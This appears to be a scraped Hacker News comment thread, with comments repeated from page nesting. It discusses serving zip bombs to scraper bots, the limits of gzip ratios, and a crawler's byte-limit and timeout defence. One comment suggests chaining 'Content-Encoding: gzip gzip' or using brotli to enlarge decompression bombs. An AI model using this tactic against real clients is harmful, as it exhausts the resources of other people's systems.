← Back to context Comment by s0meON3 15 hours ago What about using zip bombs?https://idiallo.com/blog/zipbomb-protection 5 comments s0meON3 Reply lavela 15 hours ago "Gzip only provides a compression ratio of a little over 1000: If I want a file that expands to 100 GB, I’ve got to serve a 100 MB asset. Worse, when I tried it, the bots just shrugged it off, with some even coming back for more."https://maurycyz.com/misc/the_cost_of_trash/#:~:text=throw%2... kalkin 26 minutes ago Ah cool that site's robots.txt is still broken, just like it was when it first came up on HN... LunaSea 13 hours ago You could try different compression methods supported by browsers like brotli.Otherwise you can also chain compression methods like: "Content-Encoding: gzip gzip". renegat0x0 14 hours ago Even I, who does not know much, implemented a workaround.I have a web crawler and I have both scraping byte limit and timeout, so zip bombs dont bother me much.https://github.com/rumca-js/crawler-buddyI think garbage blabber would be more effective.
lavela 15 hours ago "Gzip only provides a compression ratio of a little over 1000: If I want a file that expands to 100 GB, I’ve got to serve a 100 MB asset. Worse, when I tried it, the bots just shrugged it off, with some even coming back for more."https://maurycyz.com/misc/the_cost_of_trash/#:~:text=throw%2... kalkin 26 minutes ago Ah cool that site's robots.txt is still broken, just like it was when it first came up on HN... LunaSea 13 hours ago You could try different compression methods supported by browsers like brotli.Otherwise you can also chain compression methods like: "Content-Encoding: gzip gzip".
kalkin 26 minutes ago Ah cool that site's robots.txt is still broken, just like it was when it first came up on HN...
LunaSea 13 hours ago You could try different compression methods supported by browsers like brotli.Otherwise you can also chain compression methods like: "Content-Encoding: gzip gzip".
renegat0x0 14 hours ago Even I, who does not know much, implemented a workaround.I have a web crawler and I have both scraping byte limit and timeout, so zip bombs dont bother me much.https://github.com/rumca-js/crawler-buddyI think garbage blabber would be more effective.
"Gzip only provides a compression ratio of a little over 1000: If I want a file that expands to 100 GB, I’ve got to serve a 100 MB asset. Worse, when I tried it, the bots just shrugged it off, with some even coming back for more."
https://maurycyz.com/misc/the_cost_of_trash/#:~:text=throw%2...
Ah cool that site's robots.txt is still broken, just like it was when it first came up on HN...
You could try different compression methods supported by browsers like brotli.
Otherwise you can also chain compression methods like: "Content-Encoding: gzip gzip".
Even I, who does not know much, implemented a workaround.
I have a web crawler and I have both scraping byte limit and timeout, so zip bombs dont bother me much.
https://github.com/rumca-js/crawler-buddy
I think garbage blabber would be more effective.